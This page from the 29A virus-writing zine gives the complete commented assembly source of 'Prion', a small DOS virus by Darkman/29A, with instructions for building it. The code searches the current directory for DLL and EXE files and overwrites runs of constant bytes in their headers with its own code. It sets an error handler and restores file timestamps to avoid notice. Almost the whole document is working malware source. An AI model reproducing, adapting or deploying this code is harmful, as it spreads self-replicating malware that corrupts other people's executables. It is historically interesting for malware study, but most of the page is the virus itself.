Copy Link
Add to Bookmark
Report
29A Issue 02 05 13
comment *
Prion ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Code by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Prion is a 313 bytes parasitic direct action new executable DLL/EXE virus.
Infects every file in current directory, when executed, by searching for an
area, the size of the virus, of constant bytes and overwrites the area with
the virus. Prion has an error handler.
I would like to thank Grog for the idea to this virus and Heuristic/29A for
helping me finish it.
To compile Prion with Turbo Assembler v 4.0 type:
TASM /M PRION.ASM
TLINK /x PRION.OBJ
EXE2BIN PRION.EXE PRION.COM
*
.model tiny
.code
code_begin:
call delta_offset
delta_offset:
pop bp ; Load BP from stack
sub bp,(offset delta_offset-code_begin)
cli ; Clear interrupt-enable flag
push cs ; Save CS at stack
pop ss ; Load SS from stack (CS)
mov sp,bp ; SP = delta offset
and sp,1111111111111110b
sti ; Set interrupt-enable flag
push ax ; Save AX at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,2524h ; Set interrupt vector 24h
lea dx,[bp+int24_virus] ; DX = offset of int24_virus
int 21h
mov ah,1ah ; Set disk transfer area ddress
lea dx,[bp+dta] ; DX = offset of dta
int 21h
mov ah,4eh ; Find first matching file
mov cl,00100111b ; CL = file attribute mask
lea dx,[bp+file_specifi]
find_next:
int 21h
jnc infect_file ; No error? Jump to infect_file
pop ax ; Load AX from stack
int 21h
infect_file:
mov ax,3d00h ; Open file (read)
lea dx,[bp+filename] ; DX = offset of filename
int 21h
xchg ax,bx ; BX = file handle
jc close_file ; Error? Jump to close_file
mov ax,1220h ; Get system file table number
int 2fh
push bx ; Save BX at stack
mov ax,1216h ; Get address of system FCB
mov bl,es:[di] ; BL = system file table entry
int 2fh
pop bx ; Load BX from stack
mov byte ptr es:[di+02h],02h
mov ax,es:[di+28h] ; AX = extension of the file
mov cl,es:[di+2ah] ; CL = " " " "
cmp ax,'LD' ; DLL executable?
jne test_exe ; Not equal? Jump to test_exe
cmp cl,'L' ; DLL executable?
je read_header ; Equal? Jump to read_header
test_exe:
cmp ax,'XE' ; EXE executable?
jne close_file ; Not equal? Jump to close_file
cmp cl,'E' ; EXE executable?
jne close_file ; Not equal? Jump to close_file
read_header:
mov ah,3fh ; Read from file
mov cx,40h ; Read sixty-four bytes
lea dx,[bp+file_header] ; DX = offset of file_header
int 21h
mov si,dx ; SI = offset of file_header
mov ax,[si] ; AX = EXE signature
xor ax,'MZ' ; Found EXE signature?
jz test_new_exe ; Zero? Jump to test_new_exe
xor ax,('ZM' xor 'MZ') ; Found EXE signature?
jnz close_file ; Not zero? Jump to close_file
test_new_exe:
cmp [si+18h],cl ; New executable?
jae test_stack ; Above or equal? Jump to test_stack
close_file:
mov ah,3eh ; Close file
int 21h
mov ah,4fh ; Find next matching file
jmp find_next
test_stack:
mov ax,10h ; Multiply initial SS relative to ...
mul word ptr [si+0eh] ; DX:AX = initial SS relative to s...
add ax,[si+10h] ; DX:AX = pointer to the stack
adc dx,00h ; " " " " " "
jnz test_stack_ ; Not zero? Jump to test_stack_
or ax,ax ; No stack?
jz calc_header ; Zero? Jump to calc_header
test_stack_:
cmp ax,[si+3ch] ; Stack placed in new executable ...?
jb close_file ; Below? Jump to close_file
cmp dx,[si+3eh] ; Stack placed in new executable ...?
jb close_file ; Below? Jump to close_file
calc_header:
mov ax,10h ; Multiply header size in paragrap...
mul word ptr [si+08h] ; DX:AX = header size
mov es:[di+15h],ax ; Move file pointer to end of header
mov es:[di+17h],dx ; " " " " " " "
sub ax,[si+3ch] ; DX:AX = pointer to end of header
sbb dx,[si+3eh] ; " " " " " " "
neg dx ; Negate DX
dec dx ; Decrease DX
jnz close_file ; Not zero? Jump to close_file
lea dx,[bp+file_buffer] ; DX = offset of file_buffer
cmp ax,dx ; DOS stub too large?
jbe close_file ; Below or equal? Jump to close_fi...
neg ax ; Negate AX
push ax ; Save AX at stack
xchg cx,ax ; CX = bytes to read from file
mov ah,3fh ; Read from file
int 21h
std ; Set direction flag
dec cx ; Decrease CX
mov si,dx ; SI = offset of file_buffer
add si,cx ; SI = offset of end of file_buffer
lodsb ; AL = first byte of file_buffer
xchg ax,dx ; DL = " " " "
search_const:
lodsb ; AL = byte of file_buffer
cmp al,dl ; Equal to first byte of file_buffer?
jne test_opcode ; Not equal? Jump to test_opcode
loop search_const
pop ax ; Load AX from stack
close_file_:
jmp close_file
test_opcode:
pop ax ; Load AX from stack
cmp [si],0010000111001101b
jne close_file ; INT 21h (opcode 0cdh,21h)? Jump ...
dec cx ; Decrease CX
dec cx ; " "
sub ax,cx ; AX = offset of virus within file
mov cx,(code_end-code_begin)
cmp ax,cx ; Enough constant bytes in file?
jb close_file ; Below? Jump to close_file
sub es:[di+15h],ax ; Move file pointer to offset of v...
sbb word ptr es:[di+17h],00h
mov ah,40h ; Write to file
mov dx,bp ; DX = delta offset
int 21h
mov ax,5701h ; Set file's date and time
mov cx,[bp+file_time] ; CX = file's time
mov dx,[bp+file_date] ; DX = file's date
int 21h
jmp close_file_
int24_virus proc near ; Interrupt 24h of Prion
mov al,03h ; Fail system call in progress
iret ; Interrupt return!
endp
file_specifi db '*.*',00h ; File specification
virus_name db '[Prion] ' ; Name of the virus
virus_author db '[Darkman/29A] ' ; Author of the virus
code_end:
dta:
db 15h dup(?) ; Used by DOS for find next-process
file_attr db ? ; File attribute
file_time dw ? ; File time
file_date dw ? ; File date
filesize dd ? ; Filesize
filename db 0dh dup(?) ; Filename
file_buffer:
file_header db 40h dup(?) ; File header
end code_begin
